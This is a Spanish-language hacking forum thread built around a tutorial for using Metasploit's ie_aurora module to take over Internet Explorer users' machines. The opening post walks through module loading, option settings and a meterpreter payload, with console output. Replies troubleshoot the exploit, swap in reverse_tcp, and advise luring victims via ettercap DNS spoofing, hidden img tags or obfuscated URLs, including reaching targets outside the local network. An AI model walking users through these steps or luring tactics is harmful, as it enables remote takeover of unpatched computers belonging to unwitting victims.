Test Foro de elhacker.net SMF 2.1

Descargad el Exploit IE_Aurora.rb de http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb (http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb). Ponemos el Exploit dentro de la carpeta que nos de la gana, yo la puse en Windows/Browser/Ie_Aurora. Ingresamos a la Consola del Metasploit y cargamos el Exploit Ie_Aurora

                                 _       _
            _                   | |     (_)_
____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                          |_|


      =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops
      =[ svn r7957 updated 27 days ago (2009.12.23)

Warning: This copy of the Metasploit Framework was last updated 27 days ago.
        We recommend that you update the framework at least every other day.
        For information on updating your copy of Metasploit, please see:
            http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use windows/browser/ie_aurora
msf exploit(ie_aurora) >

Miramos que opciones tiene y cuales son requeridos
msf exploit(ie_aurora) > show options

Module options:

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SRVHOST     0.0.0.0          yes       The local host to listen on.
  SRVPORT     8080             yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

  Id  Name
  --  ----
  0   Automatic


msf exploit(ie_aurora) >

Llenamos los parametros de SRVHOST, URIPATH y Seleccionamos el PAYLOAD.
msf exploit(ie_aurora) > set SRVHOST 192.168.0.2
SRVHOST => 192.168.0.2
msf exploit(ie_aurora) > set URIPATH /
URIPATH => /
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ie_aurora) >

Lanzamos el Exploit y esperamos a que la victima ingrese a la URL.
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.
msf exploit(ie_aurora) >
[*] Started bind handler
[*] Using URL: http://192.168.0.2:8080/
[*] Server started.

Video:
[youtube=425,350]http://www.youtube.com/watch?v=4o8UPTEU_Uo[/youtube]

Se debe a: a que cuando un usuario carga manualmente un sitio Web, código ‭‬javascript especialmente conformado provoca una corrupción de memoria que en última instancia permite el acceso al sistema. Esta vulnerabilidad es extremadamente crítica, y el código lleva circulando libremente por Internet desde hace un par de días, lo que hace más que posible que el exploit, que en principio se diseñó para el robo de propiedad intelectual en un ataque segmentado contra grandes corporaciones, pueda estar explotándose de un modo más generalista.

Fuente: http://www.sahw.com/wp/archivos/2010/01/16/sobre-la-ultima-vulnerabilidad-de-internet-explorer-consejos-practicos-para-usuarios/

Muy interesante....

Seguramente en estos dias pruebo el metasploit...

fuck men la botastes, como siempre sancado buenos tutos
Felicitacionesss :D

Para este ataque es necesario que la victima se conecte mediante IE?

Cita de: ikary en 20 Enero 2010, 20:44 PM
Para este ataque es necesario que la victima se conecte mediante IE?

Joder, Si el 0Day es de Microsoft, más especificamente en el producto Internet Explorer, tu que crees?

Joer, y luego me quejo de la gente que pregunta por preguntar, y soy yo el primero en hacerlo.   :¬¬

Pido perdon por la pregunta ESTUPIDA  :silbar: es que estoy en clase y me aburro XD

Cabe destacar que ataques como este junto con dns_spoof de ettercap por ejemplo funcionan a las mil maravillas. ---> http://foro.elhacker.net/hacking_avanzado/ettercapmetasploit_suplantacion_de_identidad_por_nombre_de_dominio_spoofing-t280675.0.html

Un saludo

Ajam, Ademas el 0Day solo sacaran parche hasta Feb (Eso lei por ahi). Así que venga tio, a darle duro!

Sorry, ya que de Exploit es algo que nunca toqué, pregunto:

Ingresamos a la Consola del Metasploit

y de donde coño saco la consola con el metasploit?

Linux: ./msfconsole
Windows: msfconsole.bat

Hola, acabo de bajar el ie_aurora y lo puse en mi carpeta Windows/exploits/ y cuando pongo

use windows/exploits/ie_aurora
me dice
Failed to load module: windows/exploits/ie_aurora
no se porque pasa... me podrian ayudar?

Mi O.S: Win Vista

WTF!, No sé como instalaste ese MSF en WinVista, asi que lo unico que puedo decirte es esto... Mirad la siguiente ruta: \msf3\modules\exploits\windows\browser\, no veo que sea Windows/Exploits... xD

Intentad: use exploit/windows/ie_aurora

Hago una pregunta Stuped! Nombraste el Exploit como ie_aurora.rb?

ahh ya encontre esa ruta... es que tu dijiste que creemos una carpeta xD y yo cree una y lo puse en windir... xD
Bueno encontre la ruta  exploits/windows/browser. hay muchos archivos .rb.

No, no modifique el nombre. ya estaba como ie_aurora. Ahora intente cargar un archivo de la carpeta browser que no sea el ie_aurora.rb y funciono bien.. pero no me funciona el ie_aurora  :( me sige apareciendo el mismo error.  :-\

[-] Failed to load module: exploits/windows/browser/ie_aurora

es raro que carge todos menos el aurora no?..

EDIT:
Algunos archivos me los habia detectado el antivirus. Me los habia puesto en cuarentena pero ya los volvi a su lugar... quizas si desactivo el UAC?...

2doEDIT!:
Error mio!!! arreglado!!
habia puesto exploits y en realidad era exploit! sin la "s" xD sorry
;D

excelente tuto  ;-) gracias por esta info Shell Root

a probar se adicho   :P

Porque cuando se conecta el otro usuario me dice Started Bind handler?
y se queda ahi..

Cita de: darkgx en 21 Enero 2010, 23:55 PMPorque cuando se conecta el otro usuario me dice Started Bind handler?
y se queda ahi..

Intentad con el PAYLOAD windows/meterpreter/reverse_tcp

umm tengo un problema :huh: por que cuando pongo en la url el  http://192.168.0.2:8080/ en explorer,en el metasploit me sale

sending microsoft internet explorer "aurora" memory corruption to client  http://192.168.0.2:8080/  y de esa parte ya no pasa?

alguien sabe cual es el problema?


saludos ;D

 holas que tal, podrian subir el exploit a un servidor por descarga directa?, es que el link que pusieron ya no sirve, y la verdad es que quiero probar ese exploit jeje se ve interesante
salu2
::)

Claro que si funciona, Mirad http://www.metasploit.com/redmine/projects/framework/repository/revisions/8136/entry/modules/exploits/windows/browser/ie_aurora.rb

Cita de: Shell Root en 20 Enero 2010, 20:48 PM

Cita de: ikary en 20 Enero 2010, 20:44 PM
Para este ataque es necesario que la victima se conecte mediante IE?

Joder, Si el 0Day es de Microsoft, más especificamente en el producto Internet Explorer, tu que crees?

Sabes por casualidad que version de IE es vulnerable la injeción?

Saludos

Vulnerables XP con Internet Explorer 6 y 7. Al parecer Windows Vista e Internet Explorer 8 no lo son.

Fuente: http://foros.softonic.com/seguridad/vulnerabilidad-critica-0-day-internet-explorer-explotada-masivamente-98101

cierto yo cale con el IE 7 depues de buen rato y me salio  ;-)

CitarVulnerables XP con Internet Explorer 6 y 7. Al parecer Windows Vista e Internet Explorer 8 no lo son.

Hace días leí que investigadores ya han conseguido portarlo a Vista y Win 7, así como saltarse las protecciones DEP que usa por ej Explorer 8...

Y para echar más leña al asunto:

Citar
¿Nuevas vulnerabilidades en Internet Explorer?
Core Security Technologies dice que descubrió otro conjunto de vulnerabilidades en Internet Explorer, un día después de que Microsoft parcheara la que fue utilizada contra Google en China (la llamada Operación Aurora).

La firma dijo el viernes que descubrió otro conjunto de vulnerabilidades en Internet Explorer que los delincuentes pueden explotar, para acceder remotamente a todos los datos en un sistema.


"Hay tres o cuatro formas de llevar a cabo este tipo de ataque", dijo Jorge Luis Alvarez Medina, un consultor de seguridad de Core, que serán mostrada en la conferencia BlackHat en Washington, el próximo 2 de febrero.

Una portavoz de Microsoft dijo que no podía comentar inmediatamente sobre la cuestión.

Alvarez Medina dijo que se pueden explotar una serie de cuatro o cinco vulnerabilidades de menor importancia en Internet Explorer.  Aunque ninguna de las vulnerabilidades son lo suficientemente graves como para comprometer una máquina, se podría tomar el control de una PC mediante la explotación de todos ellos a la vez, dijo.

La combinación permitiría acceder a todos los datos en el PC después de que un usuario hiciera clic en un enlace malicioso, dijo. Alvarez Medina agregó que no estaba seguro de si ya habían explotado estas debilidades.

Core está trabajando con Microsoft para encontrar una manera de mitigar el riesgo, pero agregó que creía que otras vulnerabilidades podrían surgir incluso después de que se solucionen estas.

+Info: http://www.reuters.com/article/idUSTRE60L5O820100122

Osea, que segun esto que se plantea, si consigo montar un servidor apache u otro lo pongo publico, y todo el que se conecte con IE me dara un sesion de meterpreter?


Saludos

si no lo tiene parcheado si

Cita de: kamsky en 24 Enero 2010, 13:06 PM

CitarVulnerables XP con Internet Explorer 6 y 7. Al parecer Windows Vista e Internet Explorer 8 no lo son.

Hace días leí que investigadores ya han conseguido portarlo a Vista y Win 7, así como saltarse las protecciones DEP que usa por ej Explorer 8...

(http://img218.imageshack.us/img218/1054/tablamcafeey.png)

Fuente: http://www.genbeta.com/seguridad/analizamos-la-vulnerabilidad-de-internet-explorer-y-sus-consecuencias

- http://hacking-avanzado.blogspot.com/2010/01/gravisimo-0-day-para-todas-las.html

- http://www.pentester.es/2010/01/aurora-elevacion-de-privilegios.html

- http://www.bloggea2.com/parche-seguridad-internet-explorer-soluciona-error-aurora

- ...

cito de este último link:

CitarE6 vs. IE8 vs. declaraciones de Microsoft

Este es uno de los puntos donde Microsoft pierde usuarios, por una parte dice que este problema de seguridad "Aurora" lo poseen Internet Explorer 5, 6, 7 y 8, pero por el otro lado, también nos dice que utilicemos Internet Explorer 8 para "aprovechar sus medidas de seguridad".

Ahora bien, el parche repara el problema en las 3 versiones, lo cual indica que es cierto que las 3 versiones tenían el mismo problema. Si bien es cierto que IE8 es mas seguro que IE6, las contradicciones y declaraciones de Microsoft hacen que el pánico causado por el ataque informático sea aún mayor.

Cita de: darkgx en 21 Enero 2010, 23:55 PM
Porque cuando se conecta el otro usuario me dice Started Bind handler?
y se queda ahi..

tambien tuve este problema y tampoco resulto por reverse_tcp, ponia mi direccion local 192.168.x.x y me daba el problema, al abrir la consola web me di cuenta que el servidor se conectaba a la direccion loopback al puerto 5555 y por probar que no quede y asi  resulto pero el navegador dejo de funcionar cuando abri la direccion en metaexploit aparecio Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 127.0.0.1 con lo cual parece que iba todo correto, pero el navegador,como he dicho antes dejo de funcionar, he leido antes que con IE 8 y windows 7 no funcionaba pues ya esta comprobado ya que es el sistema operativo con el que he probado y su navegador, probare con otro sistema por curiosidad.

Cita de: gzostx 48k en 27 Enero 2010, 02:24 AM
como he dicho antes dejo de funcionar, he leido antes que con IE 8 y windows 7 no funcionaba pues ya esta comprobado ya que es el sistema operativo con el que he probado y su navegador, probare con otro sistema por curiosidad.

Efectivamente Win7 con IE8 no tiene esta vulnerabilidad mientras no se haga bypass al Data Execution Prevention (DEP). VUPEN asegura tener un script con bypass al DEP en IE8.

He probado hoy con un ordenador con Win7 y IE8, al tratar de explotar la vulnerabilidad, hasta ahora con el exploit que tienen en metasploit no se consigue el acceso, solo se consigue que el IE8 deje de funcionar.

shell root tengo una pregunta para ti, que por lo que veo eres un experto con el metasploit.
Porque al ejecutar el exploit de IE_aurora y alguno que otro, siguiendo tus pasos, me da este error?

Exploit failed: Cannot assign requested address - bind(2)

jajaj que soy que? xD

Respuesta: Posiblemente el sistema esta parcheado o el PAYLOAD no funcionará en esa situacion.

Pregunta! Estás usando el bind_tcp? Cambialo por reverse_tcp

Cita de: Shell Root en 28 Enero 2010, 18:24 PM
jajaj que soy que? xD

Respuesta: Posiblemente el sistema esta parcheado o el PAYLOAD no funcionará en esa situacion.

Pregunta! Estás usando el bind_tcp? Cambialo por reverse_tcp

:xD creo que el esta poniendo la misma direcciones que aparecen en el tuto

Cita de: R.N.A. en 28 Enero 2010, 19:22 PM:xD creo que el esta poniendo la misma direcciones que aparecen en el tuto

WTF! O_o?"

:xD ya logre que me tirara el error, sucede cuando no se puede asignar la IP que has dado como parametro en SRVHOST, por lo tanto creo que el usuario esta colocando la misma IP del tuto

alguien sabe porke sale esto?
(http://fotocarlos.ifastnet.com/kof.gif)
Saludos

Cita de: alexkof158 en 29 Enero 2010, 22:18 PM
alguien sabe porke sale esto?
(http://fotocarlos.ifastnet.com/kof.gif)
Saludos

Porque sale que?

 :-*  lo que sale en la imagen que puse xD,  ya que lo estoy probando en linux y me da error para cargar este exploit y lo pongo en las carptas que dice shell root?? saludos

Prueba a actualizar el Metasploit

cuando hablas de SRVHOST que significa la ip de la victima la del atakante o cualkier ip??
saludos

cuando cargues el exploit entonces pones show options y te saldra la descripcion

Cita de: alexkof158 en 29 Enero 2010, 23:42 PM
cuando hablas de SRVHOST que significa la ip de la victima la del atakante o cualkier ip??
saludos

... se supone que si... creo que deberias leerte algun tuto de introduccion a MetaSploit

Cita de: El Pollo Profeta en 30 Enero 2010, 04:14 AM

Cita de: alexkof158 en 29 Enero 2010, 23:42 PM
cuando hablas de SRVHOST que significa la ip de la victima la del atakante o cualkier ip??
saludos

... se supone que si... creo que deberias leerte algun tuto de introduccion a MetaSploit

se gracias ya he seguido todos los tutos y ya me voy a adentrando mas a conocer metasploit
Saludosss

Hola!
Gracias por hacernos un poco menos ignorantes, hoy por fin he conseguido hacer funcionar un exploit. El merito es de todos los que nos ilustran y a mi me queda un largooooooo camino. Un saludo.

hola!

a ver si alguien me puede dar una mano: hago todo lo dicho en el primer post:

- El metasploit corre perfecto con el aurora. Llego hasta "Server started"
- Luego cuando me conecto desde el explorer a http://mi-ip:8080/ el explorer se cuelga. - En la consola del metasploit no aparece jamas el "1 meterpreter session opened"...

El iexplore es Version: 6.0.2900.2180.xpsp_sp2_qfe.070227-2300
El metasploit lo estoy corriendo en un xp (lo que pasa es que me deje el live del bt4 por ahi y todavia no llegue a descargarlo de nuevo)

La pregunta es: será algun problema del metasploit sobre xp, acaso será la version del explorer o cual puede ser el problema?

Gracias!

No entiendo... para que sirve este exploit?? porque veo muy improbable que nadie escriba en su explorador: http://su-ip:8080/...
No??? O es que no lo estoy entendiendo bien...
Un saludo ;);)

illera88, depende de como esté tu situación, imagina que estás en red con la victima, realizas una redirección con Ettercap y voala, tenes lo que querás. Tambien podes hacer uso de la tecnica URL OBFUSCATION.

PD: Creo que sirve algo como esto. No sé!
[img=http://172.0.0.1:8080/][/img]
ó
<img src="http://172.0.0.1:8080/" />

Cita de: Alex@ShellRoot:~/msf3$ ./msfconsole en 18 Febrero 2010, 03:41 AM
illera88, depende de como esté tu situación, imagina que estás en red con la victima, realizas una redirección con Ettercap y voala, tenes lo que querás. Tambien podes hacer uso de la tecnica URL OBFUSCATION.

PD: Creo que sirve algo como esto. No sé!

Código [Seleccionar] Expandir

[img=http://172.0.0.1:8080/][/img]
ó

Código [Seleccionar] Expandir

<img src="http://172.0.0.1:8080/" />

es decir algo del estilo a esto no??: http://foro.elhacker.net/hacking_avanzado/ettercapmetasploit_suplantacion_de_identidad_por_nombre_de_dominio_spoofing-t280675.0.html

Exacto!

Excelente . Una duda:  si quiero enviarle la página a  alguien que este en una pc que no este en lan con migo ¿tengo que usar mi IP pública verdad?? (anteriormente configurada)